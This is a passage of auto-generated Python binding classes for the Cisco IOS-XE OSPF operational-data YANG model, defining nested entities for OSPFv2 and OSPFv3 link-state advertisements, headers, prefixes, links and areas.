self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
])
self.mt_id = None
self.metric = None
self.forwarding_address = None
self.external_route_tag = None
self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value)
class Ospfv3Lsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, self).__init__()
self.yang_name = "ospfv3-lsa"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody))])
self._leafs = OrderedDict()
self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header()
self.header.parent = self
self._children_name_map["header"] = "header"
self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody()
self.lsa_body.parent = self
self._children_name_map["lsa_body"] = "lsa-body"
self._segment_path = lambda: "ospfv3-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, [], name, value)
class Header(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, self).__init__()
self.yang_name = "header"
self.yang_parent_name = "ospfv3-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader))])
self._leafs = OrderedDict([
('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])),
])
self.lsa_id = None
self.lsa_hdr_options = Bits()
self.lsa_header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader()
self.lsa_header.parent = self
self._children_name_map["lsa_header"] = "lsa-header"
self._segment_path = lambda: "header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, ['lsa_id', 'lsa_hdr_options'], name, value)
class LsaHeader(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, self).__init__()
self.yang_name = "lsa-header"
self.yang_parent_name = "header"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('age', (YLeaf(YType.uint16, 'age'), ['int'])),
('type', (YLeaf(YType.uint16, 'type'), ['int'])),
('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
('length', (YLeaf(YType.uint16, 'length'), ['int'])),
])
self.age = None
self.type = None
self.adv_router = None
self.seq_num = None
self.checksum = None
self.length = None
self._segment_path = lambda: "lsa-header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value)
class LsaBody(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, self).__init__()
self.yang_name = "lsa-body"
self.yang_parent_name = "ospfv3-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix))])
self._leafs = OrderedDict([
('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])),
('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])),
])
self.lsa_flag_options = Bits()
self.lsa_body_flags = Bits()
self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network()
self.network.parent = self
self._children_name_map["network"] = "network"
self.prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix()
self.prefix.parent = self
self._children_name_map["prefix"] = "prefix"
self.ia_router = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter()
self.ia_router.parent = self
self._children_name_map["ia_router"] = "ia-router"
self.lsa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal()
self.lsa_external.parent = self
self._children_name_map["lsa_external"] = "lsa-external"
self.nssa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa()
self.nssa.parent = self
self._children_name_map["nssa"] = "nssa"
self.link_data = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData()
self.link_data.parent = self
self._children_name_map["link_data"] = "link-data"
self.ia_prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix()
self.ia_prefix.parent = self
self._children_name_map["ia_prefix"] = "ia-prefix"
self._segment_path = lambda: "lsa-body"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value)
class Network(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, self).__init__()
self.yang_name = "network"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])),
])
self.attached_router = []
self.lsa_net_options = Bits()
self._segment_path = lambda: "network"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value)
class Prefix(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, self).__init__()
self.yang_name = "prefix"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])),
('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])),
])
self.metric = None
self.ia_prefix = None
self.ia_prefix_options = None
self._segment_path = lambda: "prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value)
class IaRouter(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, self).__init__()
self.yang_name = "ia-router"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])),
('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])),
])
self.metric = None
self.destination_router_id = None
self.lsa_ia_options = Bits()
self._segment_path = lambda: "ia-router"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value)
class LsaExternal(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, self).__init__()
self.yang_name = "lsa-external"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags))])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
])
self.metric = None
self.referenced_ls_type = None
self.external_prefix = None
self.external_prefix_options = None
self.forwarding_address = None
self.external_route_tag = None
self.referenced_link_state_id = None
self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags()
self.flags.parent = self
self._children_name_map["flags"] = "flags"
self._segment_path = lambda: "lsa-external"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
class Flags(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, self).__init__()
self.yang_name = "flags"
self.yang_parent_name = "lsa-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
])
self.e_flag = None
self._segment_path = lambda: "flags"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, ['e_flag'], name, value)
class Nssa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, self).__init__()
self.yang_name = "nssa"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal))])
self._leafs = OrderedDict()
self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal()
self.lsa_nssa_external.parent = self
self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external"
self._segment_path = lambda: "nssa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, [], name, value)
class LsaNssaExternal(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, self).__init__()
self.yang_name = "lsa-nssa-external"
self.yang_parent_name = "nssa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags))])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
])
self.metric = None
self.referenced_ls_type = None
self.external_prefix = None
self.external_prefix_options = None
self.forwarding_address = None
self.external_route_tag = None
self.referenced_link_state_id = None
self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags()
self.flags.parent = self
self._children_name_map["flags"] = "flags"
self._segment_path = lambda: "lsa-nssa-external"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
class Flags(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__()
self.yang_name = "flags"
self.yang_parent_name = "lsa-nssa-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
])
self.e_flag = None
self._segment_path = lambda: "flags"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value)
class LinkData(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, self).__init__()
self.yang_name = "link-data"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])),
('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])),
('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])),
('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])),
])
self.rtr_priority = None
self.link_local_interface_address = None
self.num_of_prefixes = None
self.lsa_id_options = Bits()
self._segment_path = lambda: "link-data"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value)
class IaPrefix(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, self).__init__()
self.yang_name = "ia-prefix"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])),
('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])),
])
self.referenced_ls_type = None
self.referenced_link_state_id = None
self.referenced_adv_router = None
self.num_of_prefixes = None
self._segment_path = lambda: "ia-prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value)
class Ospfv3Link(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Link, self).__init__()
self.yang_name = "ospfv3-link"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])),
('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])),
('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])),
('type', (YLeaf(YType.uint8, 'type'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.interface_id = None
self.neighbor_interface_id = None
self.neighbor_router_id = None
self.type = None
self.metric = None
self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value)
class Ospfv3Prefix(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, self).__init__()
self.yang_name = "ospfv3-prefix"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['prefix']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
])
self.prefix = None
self.prefix_options = None
self._segment_path = lambda: "ospfv3-prefix" + "[prefix='" + str(self.prefix) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, ['prefix', 'prefix_options'], name, value)
class Ospfv3IaPrefix(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, self).__init__()
self.yang_name = "ospfv3-ia-prefix"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['prefix']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
])
self.prefix = None
self.prefix_options = None
self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value)
class MultiTopology(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.MultiTopology, self).__init__()
self.yang_name = "multi-topology"
self.yang_parent_name = "ospf-instance"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('name', (YLeaf(YType.str, 'name'), ['str'])),
])
self.name = None
self._segment_path = lambda: "multi-topology" + "[name='" + str(self.name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.MultiTopology, ['name'], name, value)
class Ospfv2Instance(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance, self).__init__()
self.yang_name = "ospfv2-instance"
self.yang_parent_name = "ospf-oper-data"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['instance_id']
self._child_classes = OrderedDict([("ospfv2-area", ("ospfv2_area", OspfOperData.Ospfv2Instance.Ospfv2Area)), ("ospfv2-lsdb-external", ("ospfv2_lsdb_external", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal))])
self._leafs = OrderedDict([
('instance_id', (YLeaf(YType.uint32, 'instance-id'), ['int'])),
('vrf_name', (YLeaf(YType.str, 'vrf-name'), ['str'])),
('router_id', (YLeaf(YType.uint32, 'router-id'), ['int'])),
])
self.instance_id = None
self.vrf_name = None
self.router_id = None
self.ospfv2_area = YList(self)
self.ospfv2_lsdb_external = YList(self)
self._segment_path = lambda: "ospfv2-instance" + "[instance-id='" + str(self.instance_id) + "']"
self._absolute_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance, ['instance_id', 'vrf_name', 'router_id'], name, value)
class Ospfv2Area(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area, self).__init__()
self.yang_name = "ospfv2-area"
self.yang_parent_name = "ospfv2-instance"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['area_id']
self._child_classes = OrderedDict([("ospfv2-lsdb-area", ("ospfv2_lsdb_area", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea)), ("ospfv2-interface", ("ospfv2_interface", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface))])
self._leafs = OrderedDict([
('area_id', (YLeaf(YType.uint32, 'area-id'), ['int'])),
])
self.area_id = None
self.ospfv2_lsdb_area = YList(self)
self.ospfv2_interface = YList(self)
self._segment_path = lambda: "ospfv2-area" + "[area-id='" + str(self.area_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area, ['area_id'], name, value)
class Ospfv2LsdbArea(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea, self).__init__()
self.yang_name = "ospfv2-lsdb-area"
self.yang_parent_name = "ospfv2-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['lsa_type','lsa_id','advertising_router']
self._child_classes = OrderedDict([("ospfv2-router-lsa-links", ("ospfv2_router_lsa_links", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks)), ("unsupported-lsa", ("unsupported_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa)), ("router-lsa", ("router_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa)), ("network-lsa", ("network_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa)), ("network-summary-lsa", ("network_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa)), ("router-summary-lsa", ("router_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa)), ("external-lsa", ("external_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa)), ("nssa-lsa", ("nssa_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa))])
self._leafs = OrderedDict([
('lsa_type', (YLeaf(YType.uint8, 'lsa-type'), ['int'])),
('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])),
('advertising_router', (YLeaf(YType.uint32, 'advertising-router'), ['int'])),
('lsa_age', (YLeaf(YType.uint16, 'lsa-age'), ['int'])),
('lsa_options', (YLeaf(YType.bits, 'lsa-options'), ['Bits'])),
('lsa_seq_number', (YLeaf(YType.uint32, 'lsa-seq-number'), ['int'])),
('lsa_checksum', (YLeaf(YType.uint16, 'lsa-checksum'), ['int'])),
('lsa_length', (YLeaf(YType.uint16, 'lsa-length'), ['int'])),
])
self.lsa_type = None
self.lsa_id = None
self.advertising_router = None
self.lsa_age = None
self.lsa_options = Bits()
self.lsa_seq_number = None
self.lsa_checksum = None
self.lsa_length = None
self.unsupported_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa()
self.unsupported_lsa.parent = self
self._children_name_map["unsupported_lsa"] = "unsupported-lsa"
self.router_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa()
self.router_lsa.parent = self
self._children_name_map["router_lsa"] = "router-lsa"
self.network_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa()
self.network_lsa.parent = self
self._children_name_map["network_lsa"] = "network-lsa"
self.network_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa()
self.network_summary_lsa.parent = self
self._children_name_map["network_summary_lsa"] = "network-summary-lsa"
self.router_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa()
self.router_summary_lsa.parent = self
self._children_name_map["router_summary_lsa"] = "router-summary-lsa"
self.external_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa()
self.external_lsa.parent = self
self._children_name_map["external_lsa"] = "external-lsa"
